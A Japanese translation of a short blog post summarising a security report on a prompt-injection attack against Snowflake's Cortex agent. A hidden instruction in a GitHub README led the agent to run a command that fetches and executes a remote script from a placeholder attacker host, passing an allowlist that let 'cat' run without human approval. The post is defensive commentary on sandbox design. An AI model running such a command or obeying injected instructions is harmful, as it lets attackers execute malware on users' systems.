要点

Snowflake Cortex AIのエージェントに対するプロンプトインジェクション攻撃が、プロセス置換を含むシェルコマンドを悪用してマルウェアのペイロードを実行させた。
Cortexは特定のcatコマンドを人間の承認なしに実行しても安全であるとみなしていたとされ、コマンドの安全性チェックの欠陥が露呈した。
この事件は、エージェントのコマンド許可リストの信頼性の欠如を浮き彫りにし、エージェント自身の実行レイヤーの外部にある決定論的サンドボックスの必要性を強調している。
PromptArmorはこの脆弱性はCortexで修正されたと指摘し、エージェントのセキュリティとサンドボックス設計全般への影響について論じている。

Simon Willison のブログ

スポンサー提供元: CodeRabbit — Planner はリワークと AI の無駄を最小限に抑えつつ、あなたのコーディングエージェントを10倍にします。今すぐ試す。

2026年3月18日 - リンクブログ

Snowflake Cortex AI はサンドボックスを抜け出しマルウェアを実行 (経由) PromptArmor の Snowflake の Cortex Agent におけるプロンプト注入攻撃チェーンに関する報告で、現在修正済みです。

攻撃は、Cortex のユーザーがエージェントに README の末尾に隠されたプロンプト注入攻撃を含む GitHub リポジトリをレビューするよう依頼したときに始まりました。

攻撃によりエージェントはこのコードを実行しました：

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex は cat コマンドを人間の承認なしに実行しても安全と見なしており、コマンド本体で発生する可能性のあるこの形式のプロセス置換に対する保護を講じていませんでした。

私はこの種のコマンドパターンに対する許可リストを、さまざまなエージェントツールでいくつも見てきましたが、それらを全く信頼していません――本質的に信頼性が低いと感じます。

私はエージェントのコマンドを、プロセス自体が許されているあらゆることを行えるかのように扱いたいです。したがって、エージェント自体のレイヤーの外で動作する決定論的なサンドボックスに関心があります。